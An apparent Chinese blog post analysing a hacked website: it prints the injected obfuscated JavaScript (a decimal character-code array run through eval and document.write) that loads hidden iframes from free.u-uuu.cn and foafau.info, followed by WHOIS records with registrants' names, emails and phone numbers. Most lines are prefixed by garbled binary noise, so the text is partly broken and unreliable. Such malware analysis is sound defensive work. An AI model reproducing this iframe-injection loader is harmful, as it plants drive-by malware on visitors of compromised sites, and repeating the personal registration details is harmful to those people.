首发在我的博客里面,
<jd/t19DB Uh6mGL�z*& http://www.areway.cn/?p=175 �gM���_�:l 5RA<����Z. A�o�`_�",E 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
b�>q6:=((� ��z�g�]Drm <script>t=’60,105,102,114,97,109,101,
P"4M�m�,
C 32,115,114,99,61,104,116,116,112,58,47,47,
~8Sq�a%F>� 102,114,101,101,46,117,45,117,117,117,46,99,
.�"JzDs �� 110,47,101,114,114,111,114,46,104,116,109,
�:|�XCnK0� 32,119,105,100,116,104,61,49,48,48,32,104,
B!q�?_[k,� 101,105,103,104,116,61,48,62,60,47,105,102,
�tSw>@F�M 114,97,109,101,62′;
G�.VYp6)5� t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
sX'U|)/p�D _Y
YP�4lEL <script>t=’60,105,102,114,97,109,101,32,115,
w �yD%�x�( 114,99,61,104,116,116,112,58,47,47,102,114,
=j���IxI�, 101,101,46,117,45,117,117,117,46,99,110,47,
�nGZ�\�<-� 101,114,114,111,114,46,104,116,109,32,119,
P��06��.�1 105,100,116,104,61,49,48,48,32,104,101,105,
Pe,;MP�\�2 103,104,116,61,48,62,60,47,105,102,114,97,
#1l7�F�T?q 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
:c;_a-69� document.write(t);</script>
�E�*4t�8�� *9�8�T�i�| <html xmlns=”
d�i�_gWE� http://www.w3.org/1999/xhtml @aB9%An1� “>
�n�L;�K|W� <head>
]I��XAucI] <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
�[a D��:A <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
xT+
;w�[s <title>首页 - 爱生活家庭网
�U(A4v0T�� e� 2*F;.)� 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
�LV=^js�Q5 转换字符串后的大概内容是(谁点击后果自付):
~j}J<4&OvC <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
8�dV=1O$�/ �||�gEs/6- 查询玉米u-uuu.cn的详细信息:
IuKnM`��X� Domain Name: u-uuu.cn
x(yX0 ,P/7 ROID: 20070901s10001s64972306-cn
B�?��TpBd� Domain Status: ok
z\h,�SX<�U Registrant Organization: 王雷
W8uVd zQ�� Registrant Name: 王雷
'^lU�L) R Administrative Email:
czlovexs@126.com �`w��V|q~� Sponsoring Registrar: 北京万网志成科技有限公司
b7f0#*�(�? Name Server:ns.yovole.com
w&+\Wo;([b Name Server:ns1.yovole.com
.q�0�A��oM Registration Date: 2007-09-01 17:54
b.6Z�fB,+G Expiration Date: 2008-09-01 17:54
T��:@7��S� 最后PING了一下地址 都没有什么….
?7rD4�2\8H ^(m0M�$Wk* 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
"0<Sd?Sz� <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
4�d�6%
t�2 <script language=”javascript” src=”
=u[rOU{X"W http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script |�<QI%Y$dr >
wjg�}�[R@! 这个玉米应该有可能是木马作者的:
<dJIq�")�{ foafau.info的详细信息:
MyM+���C�} Access to INFO WHOIS information is provided to assist persons in
7n�<#y�;wo determining the contents of a domain name registration record in the
8�+L�7E�- Afilias registry database. The data in this record is provided by
��W�xDb3l~ Afilias Limited for informational purposes only, and Afilias does not
/\TlO.�B=� guarantee its accuracy. This service is intended only for query-based
rN'.&;�Y5� access. You agree that you will use this data only for lawful purposes
8q{1E�];:q and that, under no circumstances will you use this data to: (a) allow,
�[M<{�P5�q enable, or otherwise support the transmission by e-mail, telephone, or
��Yg|�l?d" facsimile of mass unsolicited, commercial advertising or solicitations
�:MdEr//w� to entities other than the data recipient’s own existing customers; or
sMN>wbHwh[ (b) enable high volume, automated, electronic processes that send
2�Z-,c;2�1 queries or data to the systems of Registry Operator, a Registrar, or
Hc�DyD0;L. Afilias except as reasonably necessary to register domain names or
U�!.~�X�T= modify existing registrations. All rights reserved. Afilias reserves
@q�pYDnJ:� the right to modify these terms at any time. By submitting this query,
JYl�\<Z' { you agree to abide by this policy.
Bd�.Z+#%l" Domain ID:D22418703-LRMS
&,_?>.\[�< Domain Name:FOAFAU.INFO
��Q��;Q�� Created On:20-Nov-2007 16:05:42 UTC
3[iSF5%V*p Last Updated On:20-Nov-2007 16:05:44 UTC
�\&# p1K(H Expiration Date:20-Nov-2008 16:05:42 UTC
Ql�f
9]ug) Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
��SAQs�{M� Status:CLIENT DELETE PROHIBITED
B>ge,
}{� Status:CLIENT RENEW PROHIBITED
'[�n�)N�@h Status:CLIENT TRANSFER PROHIBITED
'��'%;�EW> Status:CLIENT UPDATE PROHIBITED
T^��+1�rG� Status:TRANSFER PROHIBITED
#�?A]v>I;C Registrant ID:GODA-040110615
=��]WW'~�� Registrant Name:liu hong
x$*E\/zi<! Registrant Organization:
K:�Muj��x: Registrant Street1:beijing
4�LJ�]l:m� Registrant Street2:
k�f}F}Ad:% Registrant Street3:
A>�J1B(up Registrant City:beijing
�o- cj&Cv% Registrant State/Province:
X9�DM�^tt� Registrant Postal Code:100000
P}��+2>EU� Registrant Country:CN
kT>r<�`rt Registrant Phone:+86.860108888777
e�!.7���no Registrant Phone Ext.:
Y>�(Z�s�Hu Registrant FAX:
,^�n���-L& Registrant FAX Ext.:
#:
dR^z�r< Registrant Email:bbbshiji@163.com
D�9��e���+ Admin ID:GODA-240110615
Zj:�a-��=� Admin Name:liu hong
g?w2J6Z.`J Admin Organization:
��M�"
xZz Admin Street1:beijing
�J��TSq{NN Admin Street2:
v&k>0lV,�^ Admin Street3:
l7!U),x%/U Admin City:beijing
X�s{�:[vRW Admin State/Province:
�3�"HGEUqA Admin Postal Code:100000
D)f5pEq'� Admin Country:CN
MT;SRAm�Ur Admin Phone:+86.860108888777
J�(3gT�}z- Admin Phone Ext.:
T_(q�N�;_� Admin FAX:
�*(@L+�D0N Admin FAX Ext.:
�4jDs�0Hn" Admin Email:bbbshiji@163.com
��uWJ#+XK. Billing ID:GODA-340110615
���N�8Rm}) Billing Name:liu hong
L*kh�?PS;� Billing Organization:
1}i&HIr!b� Billing Street1:beijing
oV%(
37W9= Billing Street2:
=�)�mXCA�^ Billing Street3:
��#���Nu%] Billing City:beijing
:;" �aUHU' Billing State/Province:
SJ1w1�^#Pz Billing Postal Code:100000
�DBqg_���v Billing Country:CN
��Pm�q�x ; Billing Phone:+86.860108888777
N1D6�D$s�0 Billing Phone Ext.:
8o*\W�$K@� Billing FAX:
5K�L�9$J9k Billing FAX Ext.:
<^H1)=tlF Billing Email:bbbshiji@163.com
ccH��LL6F{ Tech ID:GODA-140110615
H1aV}KD�� Tech Name:liu hong
?Zc/upd:$N Tech Organization:
>re�aIBT Tech Street1:beijing
��A^�}i^�� Tech Street2:
R@)�'��Bs Tech Street3:
hj[+d%YZY" Tech City:beijing
�x.0k�%�H Tech State/Province:
v>x {jZkFL Tech Postal Code:100000
m;�;0�� Cl Tech Country:CN
�4�jC4X��* Tech Phone:+86.860108888777
�>%PL_<Vbv Tech Phone Ext.:
�Tn�bGO�; Tech FAX:
�f:x�9Y{Y Tech FAX Ext.:
T% /xti5$! Tech Email:bbbshiji@163.com
>�N+b�U{s� Name Server:NS27.DOMAINCONTROL.COM
e>])m�3xvn Name Server:NS28.DOMAINCONTROL.COM
?�.rH;:9To Name Server:
��,�7n;|1` Name Server:
�>�z� fq*_ Name Server:
s=\LewF1<� Name Server:
8�o�8b'tW^ Name Server:
b7W=��H�R� Name Server:
`�:-�@�E�2 Name Server:
3/A�!_Uc�( Name Server:
L�o$Z>u4(c Name Server:
NB!'u)
lFD Name Server:
|.Y@^z;P�3 Name Server:
I,C�A�F�q� AF�9[2AH=Y 接着下载每个文件里面的代码:
5�� WN`8?� 一步一步看..
�. Ce��&9l 
�}s�kRlC� 
1�sIy�*z�� 
QK``tWLIg7 
�lRa
3v Ng 
Q`�@$j�,v 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
